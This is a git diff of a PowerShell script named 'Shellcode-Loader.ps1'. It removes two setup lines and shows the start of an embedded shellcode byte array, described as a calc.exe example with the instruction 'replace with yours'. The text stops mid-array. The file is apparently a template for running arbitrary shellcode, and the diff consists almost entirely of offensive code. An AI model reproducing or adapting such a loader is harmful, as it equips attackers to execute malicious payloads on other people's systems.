diff --git a/Shellcode-Loader.ps1 b/Shellcode-Loader.ps1 index 02b8d1d..aa49ecb 100644 --- a/Shellcode-Loader.ps1 +++ b/Shellcode-Loader.ps1 @@ -1,5 +1,4 @@ -$ProgressPreference = 'SilentlyContinue' -[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls + # start calc.exe (Will start calculator.exe), example shellcode, replace with yours [Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,